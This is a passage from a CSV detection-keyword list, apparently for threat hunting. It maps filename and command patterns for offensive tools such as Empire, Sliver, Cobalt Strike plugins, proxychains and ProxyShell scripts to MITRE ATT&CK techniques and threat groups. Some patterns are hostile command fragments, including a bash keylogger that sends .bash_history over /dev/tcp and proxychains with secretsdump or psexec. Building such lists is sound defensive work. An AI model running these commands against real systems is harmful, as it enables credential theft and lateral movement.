Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessThoroughLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessThoroughRemote*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Processus-Thief/HEKATOMB*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*ProcessWinSCPLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*produkey.zip*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*produkey_setup.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*produkey-x64.zip*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*profiles generate --save *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*profiles new beacon *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*profiles new --mtls *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*ProgIDsUACBypass.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*program/replay.pl*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*projectdiscovery/interactsh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*,greyware_tool_keyword,bash,Bash Keylogger,T1059 - T1003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*prosody2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*prowler gcp --credentials-file path*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Proxmark*,offensive_tool_keyword,Proxmark,The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. 
listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.,T1210 - T1561 - T1336 - T1335,TA0002 - TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/Proxmark/proxmark3,1,1,N/A,N/A,10,2872,891,2021-03-30T06:59:59Z,2014-03-16T23:36:31Z -*proxmark3 -p /dev/ttyACM0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Proxy bypass enabled for Neo4j connection*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*Proxy Shellcode Handler*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,0,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*proxy.py --dns * --dns_port * --clients*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,0,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*proxy_bypass.py*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*proxy_cmd_for_exec_by_sibling*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*proxy_linux_amd64*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*proxychains -*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains atexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains dcomexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains nmap -sT * -p * -Pn -A*,offensive_tool_keyword,ligolo,proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*proxychains nmap*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any 
given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains psexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains rdesktop *,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*proxychains secretsdump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains smbclient -L *,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains smbexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - 
T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains telnet*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains wmiexec.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*proxychains*scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*proxychains.conf*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains.lsm*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains.sourceforge.net*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains-master*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*proxychains-other.conf*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any 
other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*Proxy-DLL-Loads*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyDllLoads.c*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyDllLoads.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*proxyLogon.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation 
tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*proxyshell.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*proxyshell_rce.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*proxyshellcodeurl*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 